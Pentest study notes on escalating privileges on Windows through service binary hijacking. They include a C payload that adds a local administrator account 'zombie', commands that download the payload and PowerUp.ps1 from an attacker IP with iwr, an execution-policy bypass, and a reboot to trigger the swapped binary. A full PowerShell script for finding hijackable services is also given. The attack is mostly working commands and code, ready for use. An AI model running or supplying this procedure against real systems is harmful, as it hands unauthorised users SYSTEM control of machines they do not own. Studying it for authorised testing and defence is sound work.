5. Service Hijacking
- A Windows Service is a long-running background executable or application managed by the Service Control Manager.
- They are similar to daemons on Unix
- Windows Services can be managed by the Services snap-in, PowerShell, or sc.exe.
- Services commonly run as LocalSystem (NT AUTHORITY\SYSTEM), NT AUTHORITY\Network Service, or NT AUTHORITY\Local Service.
- Whoever creates a service can choose one of those built-in accounts, a domain user, or a local user.
Writable Files + Directories
Writable files from the root directory (note: dir's /a-r matches files without the read-only attribute, not files your user can actually write; confirm candidates with icacls):
cmd /c 'dir C:\ /a-r-d /s /b'
Writable directories from the root directory (same caveat):
cmd /c 'dir C:\ /ad-r /s /b'
Manual Service Binary Hijacking
- Each Windows service has an associated binary file.
- They are executed when the service is started or transitioned into a running state.
- An unprivileged user can tamper with a misconfigured service that runs under a more privileged account (typically SYSTEM) to escalate privileges.
- Look for services whose binary sits outside C:\Windows\System32: these are usually third-party installs configured by hand, which is where weak ACLs come from.
- Enumerate running services and their binary paths:
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Alternatives: Get-Service, Get-WmiObject -Class win32_service, or services.msc
- Enumerate permissions on each identified binary (and on its directory), looking for entries granted to your user or to broad groups such as BUILTIN\Users, Authenticated Users, or Everyone:
icacls "C:\xampp\apache\bin\httpd.exe"
Alt. Get-Acl
Permissions:
F: Full access
M: Modify access
RX: Read and execute access
R: Read-only access
W: Write-only access
- Create a malicious binary. Example in C which creates a new local administrator (both commands succeed because the service runs the binary as SYSTEM):
#include <stdlib.h>

int main(void)
{
    int i;
    /* create the user, then add it to the local Administrators group */
    i = system("net user zombie password123! /add");
    i = system("net localgroup administrators zombie /add");
    return i;
}
- Cross-compile it to a 64-bit .exe for Windows:
x86_64-w64-mingw32-gcc <file>.c -o <file>.exe
- Serve the binary, download it on the target, back up the original service binary, and move the new one into its place under the original name:
iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
move <pre-path> <post-path>
- Try to restart the service manually (if your user is allowed to stop and start it):
net stop <servicename>
net start <servicename>
#Or run:
Restart-Service <servicename>
#Use the service Name from the enumeration above, not the binary file name
- If that is not possible, check whether the service starts automatically on boot (StartMode should be Auto):
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<servicename>'}
- Check whether your user holds SeShutdownPrivilege (the Enabled/Disabled state shown does not matter; shutdown.exe enables the privilege itself if the token holds it):
whoami /priv
- Issue a system reboot using:
shutdown /r /t 0
- Remember to restore the original binary after escalation!
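The writable-path check and the manual service enumeration above, folded into one pass as an added example (not from these notes or from PowerUp): it lists running services whose binary lives outside C:\Windows, resolves the real executable from PathName (quoted or with arguments), and tests the current user's ACL rights on the binary and its directory instead of the read-only attribute that dir /a-r looks at. The function names are this example's own; service names, paths and results depend on the target host.

```powershell
# Added example, not part of the original notes. Assumes PowerShell 5.1+ with Get-CimInstance.

function Get-ServiceBinaryPath {
    param([Parameter(Mandatory)][string]$PathName)
    # PathName is either "C:\Program Files\App\svc.exe" -args (quoted) or
    # C:\xampp\apache\bin\httpd.exe -k runservice (unquoted); keep the executable only.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName
}

function Test-WritableByCurrentUser {
    param([Parameter(Mandatory)][string]$Path)
    # Evaluates Allow/Deny ACEs against the current token's user and group SIDs.
    # This is the ACL check that 'dir /a-r' (read-only attribute) does not perform.
    $id        = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids    = @($id.User) + @($id.Groups)
    $writeBits = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }

    $allowed = $false
    foreach ($ace in $acl.Access) {
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier])
        } catch { continue }
        if ($mySids -notcontains $sid) { continue }
        if (($ace.FileSystemRights -band $writeBits) -eq 0) { continue }
        # A matching Deny wins over any Allow (denies sort first in a canonical DACL).
        if ($ace.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

function Get-HijackableServiceCandidate {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.State -eq 'Running' -and $_.PathName -and
                       $_.PathName -notmatch '^"?[A-Za-z]:\\Windows\\' } |
        ForEach-Object {
            $bin = Get-ServiceBinaryPath $_.PathName
            $dir = Split-Path -Path $bin -Parent
            [pscustomobject]@{
                Name        = $_.Name
                RunsAs      = $_.StartName
                StartMode   = $_.StartMode   # Auto: a reboot restarts it for us
                Binary      = $bin
                BinWritable = (Test-Path -LiteralPath $bin) -and (Test-WritableByCurrentUser $bin)
                # Directory write lets us drop files beside the binary; swapping the binary
                # itself still needs write or Delete on the file, or FullControl on the directory.
                DirWritable = (Test-Path -LiteralPath $dir) -and (Test-WritableByCurrentUser $dir)
            }
        }
}

$candidates = Get-HijackableServiceCandidate | Where-Object { $_.BinWritable -or $_.DirWritable }
$candidates | Format-Table Name, RunsAs, StartMode, Binary, BinWritable, DirWritable -AutoSize

# Whether a reboot is an option for Auto-start services we cannot stop/start ourselves.
# 'Disabled' in the whoami output is fine: shutdown.exe enables the privilege itself.
$canReboot = [bool]((whoami /priv) -match 'SeShutdownPrivilege')
"Current user holds SeShutdownPrivilege: $canReboot"
```

Anything listed with BinWritable true and RunsAs LocalSystem is a direct target for the binary swap described above; DirWritable alone is still worth noting, since a writable service directory is also the precondition for DLL planting, which this page does not cover.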
Automatic Service Hijacking with PowerUp:
- Serve the PowerUp.ps1 on your kali machine.
- Download the script:
iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
- Start PowerShell with the execution policy bypassed and dot-source the script:
powershell -ep bypass
. .\PowerUp.ps1
- Now check modifiable services identified:
Get-ModifiableServiceFile
- Use the AbuseFunction listed next to the service (-Name is the service Name from the command above). By default Install-ServiceBinary replaces the service binary with one that adds a local user john with password Password123! to Administrators (override with -UserName and -Password) and keeps a .bak copy of the original, which Restore-ServiceBinary puts back afterwards:
Install-ServiceBinary -Name 'mysql'
- Win!